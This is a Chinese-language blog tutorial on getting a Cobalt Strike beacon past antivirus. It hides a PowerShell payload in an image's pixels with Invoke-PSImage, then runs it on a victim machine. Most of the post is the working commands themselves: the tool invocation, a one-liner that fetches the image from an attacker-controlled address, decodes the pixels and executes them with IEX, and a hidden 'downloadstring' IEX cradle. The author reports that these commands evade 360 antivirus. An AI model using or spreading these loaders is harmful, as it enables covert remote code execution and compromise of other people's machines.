使用powershell免杀上线CS的新方式---利用图片

柔情只为你懂 2022-11-16 05:58 437阅读 0赞

### 文章目录 ###

*  利用工具
 *  模拟上线
 *  总结
 *  参考文章

# 利用工具 #

1.  [Invoke-PSImage][]
2.  任意一张图片

# 模拟上线 #

1.使用cs生成一个powershell的payload。  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]

2.执行工具脚本并保存生成的上线命令：

工具脚本命令：

powershell -exec bypass "Import-Module ./Invoke-PSimage.ps1;Invoke-PSImage -Script .\payload.ps1 -Image .\image.jpg -Out .\image.png -Web"

生成的上线命令如下：

sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://example.com/image.png"));$o=a Byte[] 3600;(0..5)|%{foreach($x in(0..599)){$p=$g.GetPixel($x,$_);$o[$_*600+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3550]))

![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]

3.将生成的恶意图片上传到服务器上：  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]

4.更改上线命令中的url地址为图片地址并在受害者机器上执行上线命令：  
`更改方框处`  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]  
更改后的命令：

sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://172.16.250.3/image.png"));$o=a Byte[] 3600;(0..5)|%{foreach($x in(0..599)){$p=$g.GetPixel($x,$_);$o[$_*600+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3550]))

5.上线完成

![在这里插入图片描述][20210407104326719.png]  
360未爆毒  
![在这里插入图片描述][watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]

# 总结 #

如果我们先用命令进入powershell然后执行上线命令，确实可以绕过杀软，如果我们直接在cmd页面执行:

powershell  sal a New-Object;Add-Type -A System.Drawing;$g=a System.Drawing.Bitmap((a Net.WebClient).OpenRead("http://172.16.250.3/image.png"));$o=a Byte[] 3600;(0..5)|%{foreach($x in(0..599)){$p=$g.GetPixel($x,$_);$o[$_*600+$x]=([math]::Floor(($p.B-band15)*16)-bor($p.G -band 15))}};IEX([System.Text.Encoding]::ASCII.GetString($o[0..3550]))

`杀软会爆毒。`

--------------------

一般情况下cs的上线代码为：

powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://10.95.57.87:82/a'))"

直接执行下面代码也可以上线，而且杀软也不会爆毒：

IEX ((new-object net.webclient).downloadstring('http://10.95.57.87:82/a'))

# 参考文章 #

[Shellcode隐写到预期RGB免杀上线到CobaltStrike][Shellcode_RGB_CobaltStrike]

[Invoke-PSImage]: https://github.com/dayuxiyou/Invoke-PSImage
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70]: /images/20221022/ef0f8c87d2994df6820c61ff73bd6bfe.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 1]: /images/20221022/0e314f92076746aca82e9e82436248a3.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 2]: /images/20221022/23af9ffc7c2943438101e1bfa5fc633b.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 3]: /images/20221022/73181d6bc17849749d20e4944d8e1ff0.png
[20210407104326719.png]: /images/20221022/4f8bd44679ce40e6ac40764249bc5e1c.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3FxXzQxODc0OTMw_size_16_color_FFFFFF_t_70 4]: /images/20221022/e711289056ab4d91957a0dac9bc9539a.png
[Shellcode_RGB_CobaltStrike]: https://mp.weixin.qq.com/s/SwzgK6P-ActQ8n0NqOmDlg